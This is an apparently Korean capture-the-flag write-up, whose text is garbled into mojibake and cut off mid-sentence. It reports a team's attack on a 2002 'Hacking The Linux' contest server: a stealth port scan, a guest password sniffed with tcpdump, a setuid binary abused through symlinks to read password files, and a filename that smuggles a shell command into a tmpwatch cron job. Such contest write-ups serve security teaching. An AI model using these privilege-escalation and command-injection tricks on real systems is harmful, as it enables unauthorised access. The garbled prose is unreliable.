:::
´ÙÀ½Àº À̹ø Á¦ 1ȸ Hacking The Linux Contest¿¡¼ 1À§¸¦ Â÷ÁöÇÑ nwsr
ÆÀÀÇ °ø°Ý º¸°í¼ÀÔ´Ï´Ù. :::
1.
WarGameÀ» ÇϱâÀ§ÇÑ È¯°æ±¸Ãà.
(1).
³×Æ®¿÷ ¸ð´ÏÅ͸µÀ» ÇÒ¼öÀÖ¾î¾ß ÇÑ´Ù.
(2).
¿ÜºÎÀÇ µµ½º°ø°ÝÀ¸·ÎºÎÅÍ ÀÚ½ÅÀ» ¹æ¾îÇÒ¼ö ÀÖ¾î¾ß ÇÏ°ÚÁÒ..
2.
¹®Á¦¿¡ µµÀü.
-´ëȸ°¡
½ÃÀ۵Ǿú½À´Ï´Ù.!
´ëȸ
¼¹ö IP ADDRESS : 211.215.55.247
*
Ãë¾àÁ¡ ÈùÆ®´Â ´ëȸ ÁøÇà µµÁß ¾÷µ¥ÀÌÆ® µË´Ï´Ù.
*
¼¹ö ³»ÀÇ Æ¯Á¤ ±ÇÇÑÀ» ¾òÀº ÀÚ´Â /bin/register ¸í·ÉÀ»
½ÇÇà ½ÃÄÑ °íÀ¯ ¹øÈ£¸¦ µî·ÏÇÏ¿©¾ß ÀÎÁ¤À» ¹ÞÀ» ¼ö
ÀÖ½À´Ï´Ù.
|
´ëȸ°¡
½ÃÀÛµÇ¸é¼ ÁÖ¾îÁø°ÍÀº
<´ëȸ
¼¹ö IP ADDRESS : 211.215.55.247>
µü
1°¡Áö ÀÔ´Ï´Ù.
ÀÌ°ÍÀ»
º» Âü°¡ÀÚ´Â ¾Æ¸¶ ÀÌ·¨À» °ÍÀÔ´Ï´Ù. -- ¹» ¿ìÂ¥¶ó²¿...
ù¹ø°
¹®Á¦´Â ¸®¸ðÆ® ¹®Á¦ÀÔ´Ï´Ù.
-
´ëȸ µµÁß¿¡ °ø°³µÈ ¸®¸ðÆ® Ãë¾àÁ¡¿¡ ´ëÇÑ ÈùÆ®µé.
*
À̹ø ´ëȸ¿¡´Â ÃÑ 5°³ÀÇ ¸®¸ðÆ® Ãë¾àÁ¡ÀÌ ÁغñµÇ¾î ÀÖ½À´Ï´Ù.
±×
Áß 3°³´Â À¥ »ó¿¡¼ ÀÌ·ç¾î Áö´Â °ÍÀ̸ç, ÇÑ °³´Â ÅÚ³Ý,
³ª¸ÓÁö ÇÑ °³´Â
ƯÁ¤
Æ÷Æ®¸¦ ÅëÇÏ¿© ¹®Á¦¸¦ ÇØ°áÇÒ ¼ö ÀÖ½À´Ï´Ù.
*
5°³ÀÇ Ãë¾àÁ¡ Áß Çϳª¸¸ ¼º°øÇصµ ·ÎÄà Á¢¼Ó ±ÇÇÑÀ» ¾òÀ»
¼ö ÀÖ½À´Ï´Ù.
*
"ù ¹øÀç ¸®¸ðÆ® ¾îÅà ¹®Á¦" °ü·Ã ÈùÆ®ÀÔ´Ï´Ù.
[ Ŭ¸¯ ]
±¸Å¸´Â
211.215.55.247 ¼¹ö¿¡ ÀÚ½ÅÀÇ °³ÀΠȨÆäÀÌÁö¸¦
¿î¿µÇÏ°í
ÀÖ¾ú´Ù. ±×·¯´ø ¾î´À³¯ ±¸Å¸´Â ÀÚ½ÅÀÇ È¨ÆäÀÌÁö¿¡µµ ¸ÞÀÎ
ÆäÀÌÁö¿¡¼
°Ô½ÃÆÇÀÇ ±ÛµéÀ» ¹Ì¸®º¼ ¼ö ÀÖ´Â ±â´ÉÀ» ³Ö°í ½Í¾îÁ³´Ù.
¿©±â
Àú±â¿¡¼ php¿Í mysql¿¡ ´ëÇÑ Á¤º¸¸¦ ÀÍÇô °á±¹ ¹Ì¸®º¸±â
±â´ÉÀ»
³Ö´Â
°Í¿¡ ¼º°øÇÑ ±¸Å¸´Â ÈíÁ·ÇÑ ¹Ì¼Ò¸¦ Áö¾ú´Ù.
ÇÏÁö¸¸
±× ¹Ì¸®º¸±â ±â´ÉÀ» ³Ö´Â °úÁ¤ µµÁß ¼¹ö¿¡ Remote HoleÀÌ
»ý°å´Ù´Â
°ÍÀ» ±¸Å¸´Â ¾Ë±î? ÈùÆ®´Â ±¸Å¸°¡ Æò¼Ò¿¡ ³ª¸ð À¥¿¡µðÅ͸¦
ÅëÇÏ¿©
ȨÆäÀÌÁö¸¦ ¼öÁ¤ÇÑ´Ù´Â Á¡°ú WS_FTP ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ¿©
ÆÄÀÏÀ»
¾÷·Îµå
ÇÑ´Ù´Â Á¡ÀÌ´Ù.
*
"µÎ ¹ø° ¸®¸ðÆ® ¾îÅà ¹®Á¦" °ü·Ã ÈùÆ®ÀÔ´Ï´Ù.
- "8888¹ø Æ÷Æ®¿¡ ºñ¹ÐÀÌ ¼û¾îÀÖ´Ù!"
*
"¼¼ ¹ø° ¸®¸ðÆ® ¾îÅà ¹®Á¦" °ü·Ã ÈùÆ®ÀÔ´Ï´Ù.
- [ httpd.conf ] --> ÷ºÎ ÆÄÀÏ
Âü°í.
*
"³× ¹ø° ¸®¸ðÆ® ¾îÅà ¹®Á¦" °ü·Ã ÈùÆ®ÀÔ´Ï´Ù.
- À½¾Ç Ãßõ Æû¿¡ ±ä ¹®ÀÚ¿À» ÀÔ·ÂÇØ
º¸¼¼¿ä.
*
"´Ù¼¸ ¹ø° ¸®¸ðÆ® ¾îÅà ¹®Á¦" °ü·Ã ÈùÆ®ÀÔ´Ï´Ù.
- chat °èÁ¤ Á¢¼Ó ÈÄ ¿ª½Ã ±ä ¹®ÀÚ¿À»
´Ð³×ÀÓÀ¸·Î..
|
ÀÚ..
Â÷±ÙÂ÷±Ù ½ÃÀÛÇØ º¼±î¿ä..
ÈùÆ®°¡
ÁÖ¾îÁö±â Àü¿¡ ÁøÇà.
¸ÕÀú
ÁÖ¾îÁø ¼¹öÀÇ Ãë¾àÁ¡À» ÆľÇÇϱâ À§ÇÏ¿© ¿¸° Æ÷Æ®¸¦ È®ÀÎ ÇÕ´Ï´Ù.
[root@localhost
root]# nmap -v -sS -O 211.215.55.247
Starting
nmap V. 3.00 ( www.insecure.org/nmap/ )
Host
(211.215.55.247) appears to be up ... good.
Initiating
SYN Stealth Scan against (211.215.55.247)
Adding
open port 80/tcp
Adding
open port 1440/tcp
Adding
open port 3306/tcp
Adding
open port 111/tcp
Adding
open port 23/tcp
Adding
open port 8888/tcp
The
SYN Stealth Scan took 4 seconds to scan 1601 ports.
For
OSScan assuming that port 23 is open and port 1 is closed
and neither
are
firewalled
Interesting
ports on (211.215.55.247):
(The
1595 ports scanned but not shown below are in state:
closed)
Port
State Service
23/tcp
open telnet
80/tcp
open http
111/tcp
open sunrpc
1440/tcp
open eicon-slp
3306/tcp
open mysql
8888/tcp
open sun-answerbook
Remote
operating system guess: Linux Kernel 2.4.0 - 2.5.20
Uptime
0.097 days (since Sun Aug 18 12:45:25 2002)
TCP
Sequence Prediction: Class=random positive increments
Difficulty=3694222
(Good luck!)
IPID
Sequence Generation: All zeros
Nmap
run completed -- 1 IP address (1 host up) scanned in
10 seconds
|
ÀÌ·¸°Ô
Æ÷Æ®°¡ ¿¸°°ÍÀ» È®ÀÎÇß½À´Ï´Ù.
´ÙÀ½Àº
ÇØ´ç Æ÷Æ®°¡ ¾î¶»°Ô ÀÀ´äÀ» ÇÏ´ÂÁö È®ÀÎÀ» ÇÕ´Ï´Ù.
À̶§
³×Æ®¿÷À¸·Î ¿Ô´Ù°¬´ÙÇÏ´Â ÆÐŶÀ» º¼¼ö ÀÖµµ·Ï ÇÁ·Î±×·¥À» ½ÇÇàÇØ µÓ´Ï´Ù.
[root@localhost
root]# tcpdump -i ppp0 -X -s 0
tcpdump:
listening on ppp0
*
"µÎ ¹ø° ¸®¸ðÆ® ¾îÅà ¹®Á¦" °ü·Ã ÈùÆ®ÀÔ´Ï´Ù. - "8888¹ø
Æ÷Æ®¿¡ ºñ¹ÐÀÌ ¼û¾îÀÖ´Ù!"
µÎ¹ø°
¸®¸ðÆ® ¾îÅà ¹®Á¦¿¡ µµÀüÀ» ÇØ º¸°Ú½À´Ï´Ù.
http://211.215.55.247:8888
ID
: guest, PW : welcome..........................Á¢¼Ó ¿Ï·á!! ¼û°ÜÁø
¹®ÀÚ¿À» ã¾Æ¶ó!!
¹Ù·Î
³ª¿Í¹ö¸®³×...
´Ù¸¥¹æ¹ýÀ»
º¸°Ú½À´Ï´Ù.
[test@localhost
test]$ nc 211.215.55.247 8888
Á¢¼Ó
¿Ï·á!! ¼û°ÜÁø ¹®ÀÚ¿À» ã¾Æ¶ó!!
[test@localhost
test]$
À̶§
tcpdump µÈ ³»¿ëÀ» º¸¸é...
[root@localhost
root]# tcpdump -i ppp0 -X -s 0
tcpdump:
listening on ppp0
14:28:28.901243
210.102.156.204.38525 > 211.215.55.247.8888: S
2601461655:2601461655(0)
win 5808 <mss 1452,sackOK,timestamp 258286103
0,nop,wscale
0> (DF)
0x0000
4500 003c 0580 4000 4006 ba3a d266 9ccc E..<..@.@..:.f..
0x0010
d3d7 37f7 967d 22b8 9b0f 2797 0000 0000 ..7..}"...'.....
0x0020
a002 16b0 0905 0000 0204 05ac 0402 080a ................
0x0030
0f65 2217 0000 0000 0103 0300 .e".........
14:28:28.929386
211.215.55.247.8888 > 210.102.156.204.38525: S
2894122521:2894122521(0)
ack 2601461656 win 5792 <mss 1412,sackOK,timestamp
618371
258286103,nop,wscale 0> (DF)
0x0000
4500 003c 0000 4000 3606 c9ba d3d7 37f7 E..<..@.6.....7.
0x0010
d266 9ccc 22b8 967d ac80 ce19 9b0f 2798 .f.."..}......'.
0x0020
a012 16a0 1f05 0000 0204 0584 0402 080a ................
0x0030
0009 6f83 0f65 2217 0103 0300 ..o..e".....
14:28:28.929406
210.102.156.204.38525 > 211.215.55.247.8888: . ack
1 win
5808
<nop,nop,timestamp 258286105 618371> (DF)
0x0000
4500 0034 0581 4000 4006 ba41 d266 9ccc E..4..@.@..A.f..
0x0010
d3d7 37f7 967d 22b8 9b0f 2798 ac80 ce1a ..7..}"...'.....
0x0020
8010 16b0 4d88 0000 0101 080a 0f65 2219 ....M........e".
0x0030
0009 6f83 ..o.
14:28:28.957471
211.215.55.247.8888 > 210.102.156.204.38525: P 1:88(87)
ack
1
win 5792 <nop,nop,timestamp 618373 258286105>
(DF)
0x0000
4500 008b a19f 4000 3606 27cc d3d7 37f7 E.....@.6.'...7.
0x0010
d266 9ccc 22b8 967d ac80 ce1a 9b0f 2798 .f.."..}......'.
0x0020
8018 16a0 660a 0000 0101 080a 0009 6f85 ....f.........o.
0x0030
0f65 2219 4944 203a 2067 7565 7374 2c20 .e".ID.:.guest,.
0x0040
5057 203a 2077 656c 636f 6d65 0808 0808 PW.:.welcome....
0x0050
0808 0808 0808 0808 0808 0808 0808 0808 ................
0x0060
0808 0808 0808 c1a2 bcd3 20bf cfb7 e121 ...............!
0x0070
2120 bcfb b0dc c1f8 20b9 aec0 dabf adc0 !...............
0x0080
bb20 c3a3 bec6 b6f3 2121 0a ........!!.
14:28:28.957482
210.102.156.204.38525 > 211.215.55.247.8888: . ack
88 win
5808
<nop,nop,timestamp 258286108 618373> (DF)
0x0000
4500 0034 0582 4000 4006 ba40 d266 9ccc E..4..@.@..@.f..
0x0010
d3d7 37f7 967d 22b8 9b0f 2798 ac80 ce71 ..7..}"...'....q
0x0020
8010 16b0 4d2c 0000 0101 080a 0f65 221c ....M,.......e".
0x0030
0009 6f85 ..o.
14:28:28.957708
211.215.55.247.8888 > 210.102.156.204.38525: F 88:88(0)
ack
1
win 5792 <nop,nop,timestamp 618373 258286105>
(DF)
0x0000
4500 0034 a1a0 4000 3606 2822 d3d7 37f7 E..4..@.6.("..7.
0x0010
d266 9ccc 22b8 967d ac80 ce71 9b0f 2798 .f.."..}...q..'.
0x0020
8011 16a0 4d3e 0000 0101 080a 0009 6f85 ....M>........o.
0x0030
0f65 2219 .e".
14:28:28.957837
210.102.156.204.38525 > 211.215.55.247.8888: F 1:1(0)
ack 89
win
5808 <nop,nop,timestamp 258286108 618373> (DF)
0x0000
4500 0034 0583 4000 4006 ba3f d266 9ccc E..4..@.@..?.f..
0x0010
d3d7 37f7 967d 22b8 9b0f 2798 ac80 ce72 ..7..}"...'....r
0x0020
8011 16b0 4d2a 0000 0101 080a 0f65 221c ....M*.......e".
0x0030
0009 6f85 ..o.
|
id
: guest, pw : welcome ÀÔ´Ï´Ù.
µåµð¾î
¼¹ö·Î Á¢¼ÓÀ» ÇÒ¼ö ÀÖ´Â °èÁ¤ÀÌ ³ª¿Ô³×¿ä.
-
´ëȸ µµÁß °ø°³µÈ ·ÎÄà Ãë¾àÁ¡¿¡ ´ëÇÑ ÈùÆ®µé.
*
walwal ±ÇÇÑÀº ±â¼úÀÌ ¾Æ´Ñ ¸Ó¸®¸¦ ½á¼ ȹµæÇÒ ¼ö ÀÖ½À´Ï´Ù.^^
gdb ÇÊ¿ä ¾ø¾î¿ä~
*
walwal ±ÇÇÑ È¹µæÀÇ ÈùÆ® - Group id°¡ walwalÀÎ ÆÄÀÏÀ»
ã¾Æº¸¼¼¿ä.!
|
telnet
211.215.55.247
¦®¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¯
¦
+ +
¦
¦
!!!!! HackerSchool Hacking Event !!!!! ¦
¦
+ +
¦
¦
"Hacking The Linux Server Festival" ¦
¦ ¦
¦
[ Ÿ°Ù ¼¹ö¿¡ Á¢¼ÓÇϼ̽À´Ï´Ù. ÁÁÀº °á°ú ÀÖ±æ ¹Ù¶ø´Ï´Ù.^^
] ¦
¦
:: ¾ÆÁ÷ µî·Ï ½ÅûÀ» ÇÏÁö ¾ÊÀ¸½Å ºÐÀº ÇØÄ¿½ºÄð :: ¦
¦
:: »çÀÌÆ®¸¦ ÅëÇØ µî·Ï ÇÏ½Ã¸é µË´Ï´Ù.(°øÁö ÂüÁ¶) :: +
¦
¦+
+
¦
¦
BBS Á¢¼Ó ID : bbs <Enter> ¦
¦
+ Å×½ºÆ® ´ëȹæ Á¢¼Ó : chat <Enter>
¦
¦
+ ¦
¦±¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦°
login:
guest
Password:
|
µåµð¾î
¼·À¸·Î µé¾î ¿Ô½À´Ï´Ù.
¹»Çؾß
ÇÒ°ÍÀΰ¡¸¦ ¶Ç ã¾Æ¾ßÁÒ..
ÀÚ½ÅÀÇ
µð·º¿¡ ¹º°¡ÀÇ ÈùÆ®°¡ ÀÖ´ÂÁö È®ÀÎÀ» ÇÕ´Ï´Ù.
bash2-2.05a$
ls -al
À½...
¾Æ¹«°Íµµ ¾ø±º¿ä...
´ÙÀ½Àº
ÀÚ½ÅÀÇ id¸¦ È®ÀÎÇÏ°í ´ÙÀ½ ·¹º§·Î ÁøÀÔÇÒ °èÁ¤À» È®ÀÎÇÕ´Ï´Ù.
bash2-2.05a$
id
uid=1009(guest)
gid=1009(guest) groups=1009(guest)
bash2-2.05a$
cat /etc/passwd
############################################################
#
Hacking Festival Accounts #
############################################################
walwal:x:1000:1000::/home/walwal:/bin/bash
guta:x:1001:1001::/home/guta:/bin/bash
mungmung:x:1002:1002::/home/mungmung:/bin/bash
wizard:x:1003:1003::/home/wizard:/bin/bash
crypt:x:1004:1004::/home/crypt:/bin/bash
chat:x:1006:1006::/home/chat:/home/chat/curchat
guest:x:1009:1009::/home/guest:/bin/bash2
walwal
°èÁ¤ÀÇ ÈÀÏÀ» ã¾Æº¸°Ú½À´Ï´Ù.
bash2-2.05a$
find / -user walwal 2>/dev/null
/var/spool/mail/walwal
/etc/sysconfig/network-scripts/.hidden/GUTAPASSWD.TXT
/bin/SolveMe/HackTheNose.txt
/bin/SolveMe/walwal
/home/walwal
|
ÀÌ·±
ÆÄÀÏÀÌ ³ª¿Ô±º¿ä.
bash2-2.05a$
ls /bin/SolveMe/walwal -l
-rwsr-sr-x
1 walwal walwal 14122 Aug 16 08:38 /bin/SolveMe/walwal*
bash2-2.05a$
ls /bin/SolveMe/ -la
total
28
drwxr-xr-x
2 root root 4096 Aug 16 08:42 ./
drwxr-xr-x
3 root root 4096 Aug 16 21:31 ../
-rw-r-----
1 root walwal 143 Aug 16 08:38 HackTheNose.txt
-rwsr-sr-x
1 walwal walwal 14122 Aug 16 08:38 walwal*
|
ºÐ¼®À»
Çغ¸°Ú½À´Ï´Ù.
bash2-2.05a$
objdump -s /bin/SolveMe/walwal
Contents
of section .fini:
8048600
5589e553 52e80000 00005b81 c3221100 U..SR.....[.."..
8048610
008d7600 e857feff ff8b5dfc c9c3 ..v..W....]...
Contents
of section .rodata:
8048620
03000000 01000200 72002e2f 4861636b ........r../Hack
8048630
5468654e 6f73652e 74787400 257300 TheNose.txt.%s.
Contents
of section .data:
8049640
00000000 00000000 28970408 00000000 ........(.......
bash2-2.05a$
objdump -x /bin/SolveMe/walwal
08048364
g F .init 00000000 _init
0804839c
F *UND* 00000270 malloc@@GLIBC_2.0
080483ac
w F *UND* 00000025
__deregister_frame_info@@GLIBC_2.0
08048420
g F .text 00000000 _start
080483bc
F *UND* 00000140 fgets@@GLIBC_2.0
08049760
g O *ABS* 00000000 __bss_start
08048520
g F .text 000000a0 main
080483cc
F *UND* 000000d3 __libc_start_main@@GLIBC_2.0
08049640
w .data 00000000 data_start
080483dc
F *UND* 00000032 printf@@GLIBC_2.0
08048600
g F .fini 00000000 _fini
080483ec
F *UND* 00000189 fclose@@GLIBC_2.1
08049760
g O *ABS* 00000000 _edata
0804972c
g O .got 00000000 _GLOBAL_OFFSET_TABLE_
08049778
g O *ABS* 00000000 _end
080483fc
F *UND* 000000a0 fopen@@GLIBC_2.1
08048624
g O .rodata 00000004 _IO_stdin_used
0804840c
F *UND* 0000002d sprintf@@GLIBC_2.0
08049640
g .data 00000000 __data_start
00000000
w *UND* 00000000 __gmon_start__
bash2-2.05a$
gdb /bin/SolveMe/walwal
(gdb)
disas main
Dump
of assembler code for function main:
int
main(int char, char *argv[])
{
0x8048520
<main>: push %ebp
0x8048521
<main+1>: mov %esp,%ebp
0x8048523
<main+3>: sub $0x18,%esp
fff8
= malloc(100);
0x8048526
<main+6>: sub $0xc,%esp
0x8048529
<main+9>: push $0x64
0x804852b
<main+11>: call 0x804839c <malloc>
0x8048530
<main+16>: add $0x10,%esp
0x8048533
<main+19>: mov %eax,%eax
0x8048535
<main+21>: mov %eax,0xfffffff8(%ebp)
fff4
= malloc(0x7a69);
0x8048538
<main+24>: sub $0xc,%esp
0x804853b
<main+27>: push $0x7a69
0x8048540
<main+32>: call 0x804839c <malloc>
0x8048545
<main+37>: add $0x10,%esp
0x8048548
<main+40>: mov %eax,%eax
0x804854a
<main+42>: mov %eax,0xfffffff4(%ebp)
fffc
= fopen("./HackTheNose.txt", "r");
0x804854d
<main+45>: sub $0x8,%esp
0x8048550
<main+48>: push $0x8048628
0x8048555
<main+53>: push $0x804862a
0x804855a
<main+58>: call 0x80483fc <fopen>
0x804855f
<main+63>: add $0x10,%esp
0x8048562
<main+66>: mov %eax,%eax
0x8048564
<main+68>: mov %eax,0xfffffffc(%ebp)
0x8048567
<main+71>: nop
if
(fgets(fff8, 100, fffc)!=0) {
0x8048568
<main+72>: sub $0x4,%esp
0x804856b
<main+75>: pushl 0xfffffffc(%ebp)
0x804856e
<main+78>: push $0x64
0x8048570
<main+80>: pushl 0xfffffff8(%ebp)
0x8048573
<main+83>: call 0x80483bc <fgets>
0x8048578
<main+88>: add $0x10,%esp
0x804857b
<main+91>: mov %eax,%eax
0x804857d
<main+93>: test %eax,%eax
0x804857f
<main+95>: jne 0x8048584 <main+100>
0x8048581
<main+97>: jmp 0x80485b0 <main+144>
0x8048583
<main+99>: nop
sprintf(fff4,
"%s", fff8);
0x8048584
<main+100>: sub $0x4,%esp
0x8048587
<main+103>: pushl 0xfffffff8(%ebp)
0x804858a
<main+106>: push $0x804863c
0x804858f
<main+111>: pushl 0xfffffff4(%ebp)
0x8048592
<main+114>: call 0x804840c <sprintf>
0x8048597
<main+119>: add $0x10,%esp
printf("%s",
fff8);
0x804859a
<main+122>: sub $0x8,%esp
0x804859d
<main+125>: pushl 0xfffffff8(%ebp)
0x80485a0
<main+128>: push $0x804863c
0x80485a5
<main+133>: call 0x80483dc <printf>
0x80485aa
<main+138>: add $0x10,%esp
0x80485ad
<main+141>: jmp 0x8048568 <main+72>
0x80485af
<main+143>: nop
}
fclose(fffc);
0x80485b0
<main+144>: sub $0xc,%esp
0x80485b3
<main+147>: pushl 0xfffffffc(%ebp)
0x80485b6
<main+150>: call 0x80483ec <fclose>
0x80485bb
<main+155>: add $0x10,%esp
}
0x80485be
<main+158>: leave
0x80485bf
<main+159>: ret
|
ÀÌ·¸°Ô
ºÐ¼®À» Çغ¸¸é
fffc
= fopen("./HackTheNose.txt", "r"); ÀÌ·± Äڵ尡
³ª¿Â´Ù.
µû¶ó¼
ÇöÀç µð·º¿¡ "HackTheNose.txt" ÀÌ ÆÄÀÏÀ» ÀÐ¾î¼ Ãâ·ÂÇØÁشٴÂ
°ÍÀ» ¾Ë¼ö ÀÖ´Ù.
±×·¯¹Ç·Î
bash2-2.05a$
ln -s /bin/SolveMe/HackTheNose.txt HackTheNose.txt ·ÎÇÏ°í
bash2-2.05a$
/bin/SolveMe/walwal ./HackTheNose.txt
±¸Å¸
: ¾Æ¾¾~ ÀÌ°Ô ¹¹¾ß ¾î¶»°Ô Ç϶ó´Â°Å¾ß!
¸Û¸Û
: »ý°¢º¸´Ù ½¬¿ï²¬?
±¸Å¸
: ¹¹¾ß¹¹¾ß ÀÌ°Å Èü¿À¹öÇ÷οì¾ß? ³ª ±×°Å ¸øÇØ!
¸Û¸Û
: ¸Ó¸® µ×´Ù ¹¹ÇÏ´Ï~
|
±×·±µ¥
±× ÈÀÏ¿¡´Â ³»°¡¿øÇÏ´Â ³»¿ëÀÌ ¾ø´Ù ±×·¸´Ù¸é
bash2-2.05a$
find / -group walwal
/etc/sysconfig/network-scripts/.hidden/WALWALPASSWD.TXT
|
ÀÌ°÷¿¡
ÀÖÀ» °Å¶ó ÃßÃøÇÏ°í ÀÌÆÄÀÏ¿¡ ¸µÅ©°É¾ú´Ù
bash2-2.05a$
ln -s /etc/sysconfig/network-scripts/.hidden/WALWALPASSWD.TXT HackTheNose.txt
±×¸®°í´Â
bash2-2.05a$
/bin/SolveMe/walwal ./HackTheNose.txt
¸¶Â¡°¡
ºù°í~~~
´äÀÌ ³ª¿Ô´Ù.
[guta@localhost
guta]$ id
uid=1000(walwal)
gid=1000(walwal) groups=1000(walwal)
[guta@localhost
guta]$
walwal
±ÇÇÑÀ» ȹµæ!!
-
´ëȸ µµÁß °ø°³µÈ guta ±ÇÇÑ È¹µæ ÈùÆ®µé.
*
guta ±ÇÇÑ È¹µæ °ü·Ã ÈùÆ®ÀÔ´Ï´Ù. [ Ŭ¸¯ ]
*
guta ±ÇÇÑ È¹µæ °ü·Ã ÈùÆ®2 - ½Ã°£À» cron¿¡ ¸ÂÃßÁö ¸¶½Ã°í,
ÆÄÀÏ¿¡ ¸ÂÃ纸¼¼¿ä.
±×·³
1½Ã°£ ±â´Ù¸± ÇÊ¿ä°¡ ¾ø°ÚÁÒ..?
*
guta ±ÇÇÑ È¹µæ °ü·Ã ÈùÆ®3 - ÇöÀç ¼³Ä¡µÈ tmpwatchÀÇ ¼Ò½º
ÄÚµåÀÔ´Ï´Ù. [ Ŭ¸¯ ]
*
guta ±ÇÇÑ È¹µæ °ü·Ã ÈùÆ®4 - system() ÇÔ¼öÀÇ »ç¿ëÀº ¸Å¿ì
À§ÇèÇÕ´Ï´Ù.
ˤ
¼Ò½º Äڵ忡¼ system() ÇÔ¼ö°¡ »ç¿ëµÈ ºÎºÐÀ» Àß º¸¼¼¿ä..
|
[walwal@localhost
walwal]$ ls -al
total
28
-rw-r--r--
1 root root 77 Aug 17 15:56 hint
drwx-wxrwx
11 root walwal 4096 Aug 18 17:29 movie/
[walwal@localhost
walwal]$ cat hint
ÈùÆ®´Â
À¥¿¡ °ø°³µÇ¾î ÀÖ½À´Ï´Ù.^^
http://www.hackerschool.org/event/hint.html
|
¿ÀÀ×...
À¥¿¡...
[ÈùÆ®]
*
guta ±ÇÇÑ È¹µæ °ü·Ã ÈùÆ®ÀÔ´Ï´Ù. [ Ŭ¸¯ ]
¾î´À³¯
±¸Å¸´Â ÀÚ²Ù °èÁ¤À» ¸¸µé¾î ´Þ¶ó°í Á¶¸£´Â ¿Ð¿ÐÀÌ¿¡°Ô
walwalÀ̶ó´Â
°èÁ¤À» ¸¸µé¾î ÁÖ¾ú´Ù. ±×·±µ¥ ¸îÀÏÀÌ Áö³ ÈÄ
±¸Å¸´Â
¼¹öÀÇ ÇÏµå ¿ë·®ÀÌ ²Ë Â÷ ÀÖ´Â °ÍÀ» ¹ß°ßÇÏ¿´´Ù.
¼¹ö¸¦
Á¶»çÇØ º» ±¸Å¸´Â À̳ðÀÇ ¿Ð¿ÐÀÌ°¡ /home/walwal/movie/
µð·ºÅ丮¿¡
¿ä¼§ÇÑ µ¿¿µ»óµéÀ» ¿Õ⠿÷Á ³õÀº »ç½ÇÀ»
¾Ë°ÔµÇ¾ú´Ù.
±¸Å¸´Â Áï½Ã ¸ðµç ÆÄÀϵéÀ» »èÁ¦ ÇßÁö¸¸, ¹ßÁ¤³
¿Ð¿ÐÀÌ´Â
¾î´À»õ ¶Ç ´Ù½Ã µ¿¿µ»óµéÀ» ¸ð¾Æ ¿Ã·Á³õ°ï ÇÏ¿´´Ù.
¸î¹øÀÇ
¹Ýº¹ ³¡¿¡ Â¥ÁõÀÌ ³ ±¸Å¸´Â tmpwatch¶ó´Â ÇÁ·Î±×·¥À»
ÀÌ¿ëÇϸé
ƯÁ¤ µð·ºÅ丮ÀÇ ÆÄÀÏÀ» ÀÚµ¿À¸·Î Á¤¸®ÇÒ ¼ö ÀÖ´Ù´Â
Á¤º¸¸¦
ÀÔ¼ö. °Ë»ö ¿£ÁøÀ» ÅëÇØ tmpwatch ÇÁ·Î±×·¥À» ¹Þ¾Æ ¼³Ä¡ÇÏ¿´´Ù.
±×¸®°í
tmpwatch°¡ ÀÚµ¿À¸·Î ÀÛµ¿ÇÏ°Ô Çϱâ À§ÇÏ¿© crontab¿¡
´ÙÀ½°ú
°°ÀÌ µî·ÏÀ» ÇÏ¿´´Ù.
PATH=/usr/bin:/bin:/tmp
*
* * * * /usr/sbin/tmpwatch -m --fuser -f 1 /home/walwal/movie/
ÀÌÁ¦
¿Ð¿ÐÀÌ¿ÍÀÇ ½Å°æÀü¿¡¼ÀÇ ½Â¸®¸¦ È®½ÇÇÑ ±¸Å¸´Â tmpwatch´Â
Âü
°í¸¶¿î ÇÁ·Î±×·¥ÀÌ´Ù ¶ó°í »ý°¢Çϸç ÆíÇÏ°Ô ÀáÀÌ µé¾ú´Ù.
|
À̹®Á¦´Â
tmpwatch ¹®Á¦ÀÌ´Ù.
tmpwatch
Ãë¾àÁ¡Àº ´ÙÀ½ ÷ºÎ ÆÄÀÏÀ» Âü°íÇϼ¼¿ä.
¿©±â¼
crontab¿¡ µî·ÏµÈ tmpwatch´Â ¾î¶² ¿ªÇÒÀ» ÇÏ´ÂÁö »ìÆ캸°Ú½À´Ï´Ù.
[walwal@localhost
walwal]$ cd movie
[walwal@localhost
walwal]$ cat > f1 <-- Å×½ºÆ® ÇÒ ÆÄÀÏÀ» Çϳª ¸¸µé°í.
[walwal@localhost
movie]$ date
Sat
Aug 17 23:32:43 EDT 2002
[walwal@localhost
movie]$ touch 08172235 "\";cp f1 f2\""
|
ÀÌ·¸°Ô
Çسõ°í movie µð·ºÀ» Çѹø º¸ÀÚ.
±×·±µ¥
óÀ½¿¡´Â µð·ºÀ» º¼¼ö ÀÖ¾ú´Âµ¥ °ü¸®ÀÚ°¡ ¸·¾Æ¹ö·È´Ù.
drwx-wxrwx
11 root walwal 4096 Aug 18 17:29 movie/
¿©±â¼
±ÇÇÑÀ» º¸¸é groop(walwal)¸¸ º¼¼ö ¾øµµ·Ï ¼³Á¤µÈ°ÍÀ» ¾Ë¼öÀÖ´Ù.
±×·¡¼
ÀÌÀüÀÇ °èÁ¤(guest)À¸·Î µé¾î°¡¸é º¼¼ö ÀÖ´Ù.
[walwal@localhost
movie]$ su guest
Password:
[guest@localhost
movie]$ ls -al
total
64
-rw-rw-r--
1 walwal walwal 0 Aug 18 16:40 ";cp f1 f2"
-rw-rw-r--
1 walwal walwal 5 Aug 18 17:38 f1
-rw-r--r--
1 guta guta 5 Aug 18 17:40 f2
|
ÀÌ·¸°Ô
½ÇÇàµÈ°ÍÀ» È®ÀÎÇÒ¼ö ÀÖ´Ù.
±×·¸´Ù¸é...
PATH=/usr/bin:/bin:/tmp
*
* * * * /usr/sbin/tmpwatch -m --fuser -f 1 /home/walwal/movie/
|
crontab¿¡
¼³Á¤µÈ PATH¸¦ º¸¸é /tmp µð·ºÀ» »ç¿ëÇϵµ·Ï ¼³Á¤ÀÌ µÇ¾î ÀÖ´Ù.
±×·±µ¥
/tmpÀÇ ÆÛ¹Ô¼ÇÀÌ ¾Æ·¡¿Í °°ÀÌ µÇ¾î ÀÖ´Ù.
drwxrwx-wt
128 root root 8192 Aug 18 17:41 tmp
µû¶ó¼
